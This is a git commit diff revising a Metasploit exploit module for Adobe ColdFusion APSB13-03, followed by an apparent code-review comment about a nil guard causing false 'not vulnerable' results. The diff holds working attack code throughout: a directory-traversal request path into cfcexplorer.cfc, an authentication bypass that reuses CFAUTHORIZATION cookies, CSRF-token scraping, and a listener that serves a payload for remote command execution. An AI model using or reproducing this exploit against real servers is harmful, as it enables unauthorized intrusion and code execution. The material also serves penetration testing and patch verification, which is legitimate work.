Adding most suggested changes to jhart's adobe module

bug/bundler_fix
Tod Beardsley 2013-04-09 17:55:28 -05:00
parent 522642a65d
commit 90e986860e
1 changed files with 22 additions and 18 deletions


@ -19,23 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Adobe ColdFusion APSB13-03', 'Name' => 'Adobe ColdFusion APSB13-03',
'Description' => %q{ 'Description' => %q{
This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03: This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03:
* CVE-2013-0625: arbitrary command execution in scheduleedit.cfm (9.x only) CVE-2013-0625 (arbitrary command execution in scheduleedit.cfm (9.x only)),
* CVE-2013-0629: directory traversal CVE-2013-0629 (directory traversal), and CVE-2013-0632 (authentication bypass)
* CVE-2013-0632: authentication bypass
}, },
'Author' => 'Author' =>
[ [
'Jon Hart <jon_hart[at]rapid7.com', # Metasploit module 'Jon Hart <jon_hart[at]rapid7.com>', # Metasploit module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'CVE', '2013-0625'], [ 'CVE', '2013-0625'],
[ 'CVE', '2013-0629'], [ 'CVE', '2013-0629'],
# we don't actually exploit this, as this is the backdoor
# dropped by malware exploiting the other vulnerabilities
[ 'CVE', '2013-0631'],
[ 'CVE', '2013-0632'],
], ],
'Targets' => 'Targets' =>
[ [
@ -50,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'DefaultTarget' => 1, 'DefaultTarget' => 1,
'Privileged' => true, 'Privileged' => true,
'Platform' => [ 'win', 'linux' ], 'Platform' => [ 'win', 'linux', 'unix' ],
'DisclosureDate' => 'Jan 15 2013')) 'DisclosureDate' => 'Jan 15 2013'))
register_options( register_options(
@ -103,7 +98,13 @@ class Metasploit3 < Msf::Exploit::Remote
# if we managed to login, get the listener ready # if we managed to login, get the listener ready
datastore['URIPATH'] = rand_text_alphanumeric(6) datastore['URIPATH'] = rand_text_alphanumeric(6)
srv_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}" if (datastore['SRVHOST'] == "0.0.0.0")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
srv_port = datastore['SRVPORT'] || 80
srv_uri = "http://#{srv_host}:#{srv_port}"
start_service start_service
# drop a payload on disk which we can used to execute # drop a payload on disk which we can used to execute
@ -154,7 +155,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def on_request_uri cli, request def on_request_uri cli, request
cf_payload = "test"
case request.uri case request.uri
when "/#{datastore['URIPATH']}-e" when "/#{datastore['URIPATH']}-e"
cf_payload = <<-EOF cf_payload = <<-EOF
@ -165,6 +165,8 @@ class Metasploit3 < Msf::Exploit::Remote
EOF EOF
when "/#{datastore['URIPATH']}-p" when "/#{datastore['URIPATH']}-p"
cf_payload = payload.encoded cf_payload = payload.encoded
else
cf_payload = "test"
end end
send_response(cli, cf_payload, { 'Content-Type' => 'text/html' }) send_response(cli, cf_payload, { 'Content-Type' => 'text/html' })
end end
@ -216,9 +218,9 @@ class Metasploit3 < Msf::Exploit::Remote
'connection' => 'TE, close', 'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash), 'cookie' => build_cookie_header(cookie_hash),
}) })
cookie_hash.merge! get_useful_cookies res
if res if res
cookie_hash.merge! get_useful_cookies res
# XXX: I can only seem to get this to work if 'Enable Session Variables' # XXX: I can only seem to get this to work if 'Enable Session Variables'
# is disabled (Server Settings -> Memory Variables) # is disabled (Server Settings -> Memory Variables)
token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first
@ -541,7 +543,7 @@ class Metasploit3 < Msf::Exploit::Remote
# was just wide open # was just wide open
vuln_without_creds = false vuln_without_creds = false
paths.each do |path| paths.each do |path|
if (traverse_read path, nil) =~ /ADOBE SYSTEMS INCORPORATED/ if traverse_read(path, nil) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1 vulns += 1
vuln_without_creds = true vuln_without_creds = true
break break
@ -559,7 +561,7 @@ class Metasploit3 < Msf::Exploit::Remote
vuln_without_bypass = false vuln_without_bypass = false
paths.each do |path| paths.each do |path|
cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD'] cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD']
if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1 vulns += 1
vuln_without_bypass = true vuln_without_bypass = true
break break
@ -581,7 +583,7 @@ class Metasploit3 < Msf::Exploit::Remote
# and use it for CFAUTHORIZATION_componentutils # and use it for CFAUTHORIZATION_componentutils
cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin'] cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin']
cf_cookies.delete 'CFAUTHORIZATION_cfadmin' cf_cookies.delete 'CFAUTHORIZATION_cfadmin'
if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1 vulns += 1
vuln_with_bypass = true vuln_with_bypass = true
break break
@ -604,7 +606,7 @@ class Metasploit3 < Msf::Exploit::Remote
# the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but # the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but
# subsequently *enabled* after install, the password is unset so we simply must # subsequently *enabled* after install, the password is unset so we simply must
# check that and only that. # check that and only that.
cf_cookies = adminapi_login 'foo', 'bar', true cf_cookies = adminapi_login Rex::Text.rand_text_alpha(4), Rex::Text.rand_text_alpha(4), true
if cf_cookies.empty? if cf_cookies.empty?
print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632" print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632"
else else
@ -617,7 +619,7 @@ class Metasploit3 < Msf::Exploit::Remote
false false
end end
def traverse_read path, cookies def traverse_read(path, cookies)
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=" uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path="
uri << path uri << path
@ -628,6 +630,8 @@ class Metasploit3 < Msf::Exploit::Remote
'connection' => 'TE, close', 'connection' => 'TE, close',
'cookie' => build_cookie_header(cookies) 'cookie' => build_cookie_header(cookies)
}) })
res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '') if res and res.body
res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '')
end
end end
end end
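Review bot: The nil guard added to `traverse_read` in the last hunk makes a request that got no response indistinguishable from a patched server: the method now returns nil, and the three callers that test `traverse_read(...) =~ /ADOBE SYSTEMS INCORPORATED/` simply skip their `vulns += 1` branch. Before this change the same condition raised on `res.body`, so the failure was at least visible; now a timeout or a filtered port presumably ends in a "not vulnerable" result, which is a false negative for anyone using the check to confirm patch status. I would report the inconclusive case before the guard, e.g. `print_error "#{datastore['RHOST']} did not respond, result is inconclusive" unless res`, and have the callers treat nil as unknown rather than clean. The callers' bodies and the final status messages lie outside these hunks, so the exact output is inferred.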